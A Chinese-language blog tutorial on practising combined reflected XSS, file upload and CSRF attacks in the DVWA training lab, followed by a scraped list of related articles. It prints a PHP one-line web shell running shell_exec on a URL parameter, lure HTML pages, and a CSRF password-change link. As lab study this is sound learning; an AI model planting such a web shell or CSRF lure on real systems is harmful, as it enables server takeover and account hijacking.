反射型XSS+文件上传+CSRF—DVWA
在学习的过程中,想到将几种漏洞进行组合练习,记录下学习过程。大佬请绕过!谢谢!!
测试环境:DVWA,安装方法参考上一篇:https://www.cnblogs.com/aq-ry/p/9220584.html
前期知识:了解反射型XSS、文件上传、CSRF漏洞原理及利用方法。
一、反射型XSS;
查看源码文件:WWW\DVWA\vulnerabilities\xss_r\source\low.php
未做任何过滤,构造如下HTML代码,分别为两张图片,诱惑用户去点击,形成XSS攻击:
<!DOCTYPE html> <html> <head> <title>a标签测试</title> <meta charset="utf-8"> </head> <body> 你想成为一名黑客吗?<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/upload/"> <img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=2067493440,1557616999&fm=27&gp=0.jpg" /> </a> </body> </html>
<!DOCTYPE html> <html> <head> <title>a标签测试</title> <meta charset="utf-8"> </head> <body> 你想成为一名黑客吗?<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/csrf/"> <img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1530086683000&di=1b41000500ee5e5f73e792539819308f&imgtype=0&src=http%3A%2F%2Fe.hiphotos.baidu.com%2Fzhidao%2Fpic%2Fitem%2F738b4710b912c8fccfb476b1f4039245d6882102.jpg" /> </a> </body> </html>
第一张跳转到文件上传漏洞:
第二张跳转到CSRF漏洞:
二 、文件上传:
查看源码:WWW\DVWA\vulnerabilities\upload\source\low.php
Phpinfo一句话:<?php phpinfo();?>
Shell.php一句话木马:<?php echo shell_exec($_GET['cmd']);?>
或者上传一句话木马,用中国菜刀进行连接。
三、CSRF:
查看源码:WWW\DVWA\vulnerabilities\csrf\source\low.php
http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#
诱使用户点击此链接则修改了用户的密码:
若有错误之处,请各位大佬指出!本文属于自己原创,转载请注明出处,谢谢!
转载于:https://www.cnblogs.com/aq-ry/p/9275674.html
反射型XSS+文件上传+CSRF—DVWA相关推荐
- 文件上传漏洞——DVWA练习
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练. 文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向 ...
- xss文件上传下载学习完毕(自用总结)
xss漏洞,需要有人点你发的东西,但是原理很简单. 所以xss不做 讲解,主要是不知道讲什么 一句话木马原理 `<?php @eval($_POST['value']);?>` post只 ...
- .hpp文件_文件上传漏洞另类绕过技巧及挖掘案例全汇总
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式.如何针对性绕过检测.哪种上传和解析的场景会产生危害等还是比较模糊.本文作一些阐述,然后补充一些除了上传webshel ...
- 上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式.如何针对性绕过检测.哪种上传和解析的场景会产生危害等还是比较模糊.本文作一些阐述,然后补充一些除了上传webshel ...
- web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
注(以下环境皆是自己在本机搭建,请勿在公网真实操作) 1.注入 1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶 ...
- 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...
- SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
漏洞总结篇 SQL注入 什么是SQL注入? 怎么防御? 过滤特殊字符 修改php.in 使用mysqli_real_escape_string()函数 加固数据库方面 加固管理方面 Mybatis 防 ...
- svg + image/svg+xml 文件上传实现xss
svg + image/svg+xml 文件上传实现xss 环境:dvwa靶场 靶场关卡:文件上传 靶场难度:低级 我的吾爱破解帖子:XSS新思路-----XSS+SVG漏洞复现 https://ww ...
- 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...
- 【Web安全】中国蚁剑+DVWA(本地文件上传漏洞Upload)
文章目录 1 中国蚁剑 2 文件上传漏洞(Upload) 2.1 准备hack.php 2.2 从DVWA上传hack.php 3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源 ...
最新文章
- Vue多个单文件组件使用
- oracle12c 新特性,12c Oracle数据库新特性汇总
- python爬虫实例-python 爬虫实例
- LeetCode12- 整数转罗马数字
- 【Python】值得推荐的12个jupyter lab插件
- project 打印的时候上面的表格和下面的图例中间有个很大的空白,这块东西怎么能去掉呢?
- 移动端设备判断,ios,android,判断设备,安卓
- 简单有趣的web项目_有趣而简单的电子项目书
- python 并发编程目录
- TCP/IP 网络协议
- Spring的ioc操作 与 IOC底层原理
- mac开发工具清单java
- Java 经纬度计算两个点的之间的距离工具类
- 5G仿真-蒙特卡洛仿真方法
- FCM-模糊C均值聚类算法简介及C++实现代码
- U盘/移动硬盘 有写保护怎么解除【未解决】
- 卡饭论坛--金山毒霸/卫士 广告过滤规则(附纯文本版) [2015.7.1] 党生日版
- Bluetooth 5 新功能概述
- php 必须实现方法,php – 错误:类必须声明为抽象或实现其余的方法
- 命题公式的主合取范式C语言,用C或C++编写程序,要求:输入命题公式,给出它的主合取范式和主析取范式....
热门文章
- 使用Python监控SNMP Trap并获取OSPF邻居状态
- C++ 从入门到入土(English Version)Section 8 : Recursion, Searching and Backtracking
- 杭电计算机2010年笔试真题详解
- laravel5.5 Auth门脸类认证
- 常用 Git 命令清单(阮一峰)
- Oracle的三种高可用集群方案
- 定位日站大法之-社会工程学
- 05DotNet基本常用类库
- 稳扎稳打 Silverlight 4.0 教程
- java gbk文件转utf8_java 将GBK编码文件转为UTF-8编码